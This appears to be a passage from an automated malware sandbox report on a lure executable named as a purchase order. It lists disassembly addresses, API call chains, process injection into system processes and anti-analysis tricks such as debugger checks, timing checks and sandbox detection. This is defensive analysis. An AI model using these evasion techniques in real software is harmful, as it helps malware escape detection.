            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
            Source: PO_987654345678.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PO_987654345678.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PO_987654345678.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PO_987654345678.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PO_987654345678.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F0832D push edi; retn 0000h | 0_2_00F0832F
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F20A76 push ecx; ret | 0_2_00F20A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041583A push 0000006Eh; ret | 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004158B7 push 0000006Eh; ret | 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403400 push eax; ret | 1_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00405C1E push ebx; retf | 1_2_00405C1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F0225F pushad ; ret | 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F027FA pushad ; ret | 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F0283D push eax; iretd | 1_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx | 1_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F01368 push eax; iretd | 1_2_02F01369
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B427FA pushad ; ret | 3_2_04B427F9
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B4225F pushad ; ret | 3_2_04B427F9
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B4283D push eax; iretd | 3_2_04B42858
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B709AD push ecx; mov dword ptr [esp], ecx | 3_2_04B709B6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B418F3 push edx; ret | 3_2_04B41906
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_009924B4 push 0000006Eh; ret | 3_2_009924D5
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_00992437 push 0000006Eh; ret | 3_2_009924D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098281B push ebx; retf 3_2_0098281C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099F180 push 00000052h; retn F78Dh3_2_0099F226
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099510F pushfd ; retf 3_2_00995128
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_00995229 push ecx; ret 3_2_0099522E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099B963 push esi; iretd 3_2_0099B964
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E44A9 push edx; retf 3_2_049E44AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E34CE push ds; ret 3_2_049E34D4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049F142E push ebx; ret 3_2_049F142F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E55AE push ecx; iretd 3_2_049E55B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E469E push ss; iretd 3_2_049E46A4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E4694 push es; ret 3_2_049E469A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ED619 push ebx; retf 3_2_049ED662
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049F1732 push esi; ret 3_2_049F1733
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F1F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F1F98E
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F91C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F91C41
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO_987654345678.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-97159
            Source: C:\Users\user\Desktop\PO_987654345678.exe API/Special instruction interceptor: Address: EB3254
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\chkntfs.exe Window / User API: threadDelayed 9829
            Source: C:\Users\user\Desktop\PO_987654345678.exe API coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\chkntfs.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892 Thread sleep count: 144 > 30
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892 Thread sleep time: -288000s >= -30000s
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892 Thread sleep count: 9829 > 30
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892 Thread sleep time: -19658000s >= -30000s
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976 Thread sleep count: 35 > 30
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976 Thread sleep time: -52500s >= -30000s
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976 Thread sleep count: 45 > 30
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976 Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\chkntfs.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F6DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00F6DBBE
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F768EE FindFirstFileW,FindClose, 0_2_00F768EE
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F7698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00F7698F
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F6D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F6D076
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F6D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F6D3A9
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F79642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F79642
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F7979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F7979D
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F79B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00F79B2B
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F75C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00F75C97
            Source: C:\Windows\SysWOW64\chkntfs.exe Code function: 3_2_0099C750 FindFirstFileW,FindNextFileW,FindClose, 3_2_0099C750
            Source: C:\Windows\SysWOW64\chkntfs.exe Code function: 3_2_0099C886 FindFirstFileW,FindNextFileW,FindClose, 3_2_0099C886
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F042DE
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: ftfqgrfncDSuar.exe, 00000007.00000002.4118270822.0000000001430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2145869628.000001ACD9B4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\chkntfs.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417A63 LdrLoadDll, 1_2_00417A63
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F7EAA2 BlockInput, 0_2_00F7EAA2
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F32622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F32622
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F042DE
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F24CE8 mov eax, dword ptr fs:[00000030h] 0_2_00F24CE8
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00EB34C0 mov eax, dword ptr fs:[00000030h] 0_2_00EB34C0
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00EB3520 mov eax, dword ptr fs:[00000030h] 0_2_00EB3520
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00EB1E70 mov eax, dword ptr fs:[00000030h] 0_2_00EB1E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h] 1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h] 1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h] 1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03008324 mov eax, dword ptr fs:[00000030h] 1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h] 1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03008324 mov eax, dword ptr fs:[00000030h] 1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03008324 mov eax, dword ptr fs:[00000030h] 1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0300634F mov eax, dword ptr fs:[00000030h] 1_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h] 1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h] 1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h] 1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h] 1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h] 1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h] 1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h] 1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h] 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h] 1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h] 1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h] 1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h] 1_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h] 1_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h] 1_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h] 1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h] 1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h] 1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h] 1_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h] 1_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h] 1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 1_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h] 1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h] 1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h] 1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h] 1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h] 1_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0300625D mov eax, dword ptr fs:[00000030h] 1_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h] 1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h] 1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h] 1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h] 1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h] 1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h] 1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h] 1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h] 1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h] 1_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h] 1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h] 1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h] 1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h] 1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h] 1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h] 1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h] 1_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h] 1_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h] 1_2_02FB2349
